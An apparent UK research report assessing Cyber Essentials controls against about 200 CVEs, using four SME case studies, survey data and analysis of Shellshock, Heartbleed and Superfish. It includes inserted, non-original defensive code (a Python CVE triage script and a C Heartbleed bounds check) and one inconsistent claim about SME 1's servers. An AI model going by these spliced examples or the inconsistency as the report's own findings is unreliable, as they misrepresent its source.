CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.
Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.
User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.
Operating systems: Locally, everything is Windows 7; the remote site uses Windows 7, and 2 remote machines are Windows 8.1.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of the browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, opening them up multiple times to browser-based vectors.
Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.
SME Network Two - Specialist Group
Physical Infrastructure: The second SME participant employs 20-25, based across multiple offices in one building.
Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators via SSH.
Network Equipment includes an external Dell PowerEdge Server, four TP-Link Switch Access Points and a TP-Link DHCP Router.
Figure 7 SME-2 Network
Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows XP, Windows 7 & Windows 8, with auto-updates enabled.
Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: Email, Files & Database as well as management tools; these are used daily.
User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overall potential vulnerabilities, largely owed to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed on to the chosen service provider. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.
SME Network Three - Web Development
Physical Infrastructure: SME-3 employs 10 workers based in one building.
Employees are restricted from using their own devices unless validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.
Network Equipment includes an external Dell PowerEdge Server, one TP-Link Switch Access Point and a TP-Link DHCP Router.
Figure 9 SME-3 Network
Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows 7 & Windows 8, with auto-updates enabled.
All services are provided by cloud servers via HTTPS: Email, Files & Database as well as management tools; these are used daily.
User Access: Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.
Guests are not permitted on the network but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and Cloud Service Access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network (SME-3).
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web development SMEs to operate across multiple web browsers on various versions to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.
When working on alternative browsers, employees should only access client pages where the developer has control of the web content.
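As an added illustration of the "applicable vulnerabilities" step in these case studies (example code, not the report's own method or data), the script below parses entries in the appendix's CVE-ID-plus-description format and matches them against a software inventory constructed from the SME-3 description. The product keyword table, the impact keywords and the shortened sample entries are assumptions of this example.

```python
"""Triage an appendix of CVE entries against an SME software inventory.

Constructed example: the keyword tables and inventory below are not the
report's applicability method; they show how such a count is produced and
why it depends on how complete the inventory is.
"""
import re
from dataclasses import dataclass

# Entry format used by the appendix: "CVE-YYYY-NNNN: description".
ENTRY_RE = re.compile(r"^(CVE-\d{4}-\d{4,})\s*:?\s*(.+)$")

# Constructed table: how each product is named in NVD-style descriptions.
# Platform mentions such as "on Windows and OS X" are deliberately NOT
# treated as the vulnerable product; only vendor-product phrases count.
PRODUCT_KEYWORDS = {
    "Adobe Flash Player": ["adobe flash player"],
    "Adobe Reader": ["adobe reader"],
    "Internet Explorer": ["microsoft internet explorer"],
    "Firefox": ["mozilla firefox"],
    "Chrome": ["google chrome"],
    "Safari": ["apple safari", "safari in apple ios"],
    "Windows": ["microsoft windows"],
    "OS X": ["apple os x"],
    "Docker": ["docker "],
    "Cisco IOS": ["cisco ios"],
}

# Constructed impact classes, in the order they are reported.
IMPACT_KEYWORDS = [
    ("code execution", "execute arbitrary code"),
    ("denial of service", "denial of service"),
    ("xss", "cross-site scripting"),
    ("sql injection", "sql injection"),
    ("info disclosure", "obtain sensitive"),
    ("privilege escalation", "gain privileges"),
]

# Inventory constructed from the SME-3 description: OS X, Windows 7 & 8,
# all major browsers for compatibility testing.
SME3_INVENTORY = {"OS X", "Windows", "Firefox", "Chrome",
                  "Internet Explorer", "Safari"}

# Shortened sample entries taken from the appendix (constructed subset).
SAMPLE_APPENDIX = [
    "CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 on Windows and OS X allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.",
    "CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.",
    "CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets.",
    "CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.",
    "CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile.",
    "CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.",
]


@dataclass
class Finding:
    cve: str
    products: list          # inventory names matched in the description
    impacts: list           # impact classes matched in the description
    fixed_version_known: bool  # "before X" wording => a fixed release exists
    in_the_wild: bool       # NVD phrase "exploited in the wild"


def parse_entry(line):
    """Parse one appendix line; returns None for lines that are not entries."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        return None
    cve, text = m.group(1), m.group(2)
    low = text.lower()
    products = [p for p, kws in PRODUCT_KEYWORDS.items()
                if any(k in low for k in kws)]
    impacts = [name for name, kw in IMPACT_KEYWORDS if kw in low]
    return Finding(cve, products, impacts,
                   " before " in low, "exploited in the wild" in low)


def triage(lines, inventory):
    """Split entries into applicable / not applicable / unmatched buckets.

    'unmatched' entries name no product in the keyword table and must be
    reviewed by hand; counting them as not applicable would understate risk.
    """
    out = {"applicable": [], "not_applicable": [], "unmatched": []}
    for line in lines:
        f = parse_entry(line)
        if f is None:
            continue
        if not f.products:
            out["unmatched"].append(f.cve)
        elif any(p in inventory for p in f.products):
            out["applicable"].append(f)
        else:
            out["not_applicable"].append(f.cve)
    return out


def summarise(findings):
    """Count applicable findings per impact class (a finding may hit several)."""
    counts = {}
    for f in findings:
        for impact in f.impacts:
            counts[impact] = counts.get(impact, 0) + 1
    return counts


if __name__ == "__main__":
    result = triage(SAMPLE_APPENDIX, SME3_INVENTORY)
    for f in result["applicable"]:
        print(f.cve, f.products, f.impacts, "patch available" if f.fixed_version_known else "no fixed version named")
    print("unmatched, review by hand:", result["unmatched"])
    print("impact summary:", summarise(result["applicable"]))
```

Adding "Adobe Flash Player" to the inventory set moves CVE-2014-0515 into the applicable bucket, which is the point: the count is only as good as the asset inventory behind it.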
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet but is available only to company equipment.
The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.
Services: No local servers are present to provide any service to employees or guests on the network.
File storage is provided through on-line services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.
All the services are accessed with SSL-secured connections (HTTPS mainly).
User Access: User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.
Operating systems: The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.
Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network (SME-4).
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, so enables a wide variety of attack vectors through the web.
Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.
For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.
Survey Responses
Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.
Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation and could be considered representative of businesses across the UK.
Services: Local: File, Email, Database and Domain Servers are the most common local service providers, all present in more than a third of SMEs. Remote: Email, web hosting and file-sharing are the most common services provided remotely.
User Access: More than half of SMEs permit employees' own devices to be used in the workplace. For organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.
Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below this is access control, malware protection and finally patch management, which is present in a little over half of organisations.
Almost two-thirds of survey participantswere previously aware of Cyber Essentials
Survey Respondents Network
The network built from Survey Respondents' data considers the overall response in order to build a network easily adaptable to match that of the majority of SME network configurations.

Locally, Email and File servers have been represented, with domain controller capabilities represented in a network ADSL Router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 8 of 28
Figure 13: Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.
Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.
“ShellShock”

Also known by the name “BashDoor”, Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

“GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock”. NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.”

CVE-2014-6271 [13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix based servers for services (mail servers, for example), as they would potentially have no idea that they had been compromised.
“Heartbleed”

Appearing in April 2014, the CVE-2014-0160 (aka “Heartbleed”) bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

“The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.”

CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as yet unupdated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
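The bounds check that the Heartbleed fix introduced, shown as an added example rather than OpenSSL's own code: it parses a heartbeat message laid out as in RFC 6520 (type, 2-byte payload length, payload, at least 16 bytes of padding) and refuses to echo anything when the peer-supplied payload length does not fit inside the record actually received. Function and constant names are my own, and the two sample records are constructed.

```c
/* Added example of the Heartbeat length check; not code from OpenSSL or the report. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HB_REQUEST  1      /* heartbeat_request  (RFC 6520) */
#define HB_RESPONSE 2      /* heartbeat_response */
#define HB_PADDING  16     /* minimum padding the peer must send */

/* Build the echoed response for one heartbeat record.
 * Returns the number of bytes written to `out`, or -1 if the record must be
 * discarded. `rec_len` is the length of the record as actually received. */
int build_heartbeat_response(const uint8_t *rec, size_t rec_len,
                             uint8_t *out, size_t out_cap)
{
    /* Smallest legal message: type + 2-byte length + 16 bytes of padding. */
    if (rec_len < 1 + 2 + HB_PADDING) return -1;
    if (rec[0] != HB_REQUEST) return -1;

    size_t payload_len = ((size_t)rec[1] << 8) | rec[2];

    /* The Heartbleed fix. Pre-1.0.1g code trusted payload_len and copied that
     * many bytes from `rec` regardless of rec_len, so a record claiming 64 KiB of
     * payload but carrying a handful of bytes made memcpy read past the record
     * into whatever else sat in process memory (keys, session data, credentials).
     * Requiring the claimed length to fit inside the received record closes that. */
    if (1 + 2 + payload_len + HB_PADDING > rec_len) return -1;

    size_t resp_len = 1 + 2 + payload_len + HB_PADDING;
    if (resp_len > out_cap) return -1;

    out[0] = HB_RESPONSE;
    out[1] = (uint8_t)(payload_len >> 8);
    out[2] = (uint8_t)(payload_len & 0xff);
    memcpy(out + 3, rec + 3, payload_len);        /* now provably in bounds */
    memset(out + 3 + payload_len, 0, HB_PADDING); /* real code uses random padding */
    return (int)resp_len;
}

/* Constructed sample: a well-formed request with a 4-byte payload "ping". */
int demo_wellformed(void)
{
    uint8_t rec[1 + 2 + 4 + HB_PADDING] = { HB_REQUEST, 0x00, 0x04, 'p', 'i', 'n', 'g' };
    uint8_t out[64];
    return build_heartbeat_response(rec, sizeof rec, out, sizeof out);
}

/* Constructed sample in the Heartbleed shape: the same 23-byte record, but the
 * length field claims 65535 bytes of payload. The fixed parser rejects it. */
int demo_heartbleed_shape(void)
{
    uint8_t rec[1 + 2 + 4 + HB_PADDING] = { HB_REQUEST, 0xff, 0xff, 'p', 'i', 'n', 'g' };
    uint8_t out[64];
    return build_heartbeat_response(rec, sizeof rec, out, sizeof out);
}

int main(void)
{
    printf("well-formed record   -> response length %d\n", demo_wellformed());
    printf("oversized length     -> result %d (rejected)\n", demo_heartbleed_shape());
    return 0;
}
```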
“Superfish”

“The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.”

CVE-2015-2077 [14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the ‘normal configuration’ for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.
The vector is through the SuperFish software essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they have full access to any SSL-secured connection from the target machine.

Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis
ShellShock: Without Cyber Essentials in place, SME 1 and 2 would be at risk from ‘Shellshock’, as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The ‘Heartbleed’ bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the ‘Superfish’ issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following ‘normal’ patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.
Conclusions

The Cyber Essentials Security Tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two-hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools
The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, to deliver additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security through fortifying each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action for more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber-security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (~600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls
Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, by contrast, isn't necessarily understood by individuals as a tool to greatly improve cyber-security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and, as such, is vital to an organisation's cyber-safety.
Recommendations
To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle those other types of attacks mentioned above which were not in the scope of this report.
References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security Information Sharing Partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list/, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber Essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, and Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-cluster, 2015.

[10] HM Government. Cyber Essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyber Controls Applicability

Columns: CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE (mitigating controls)

CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
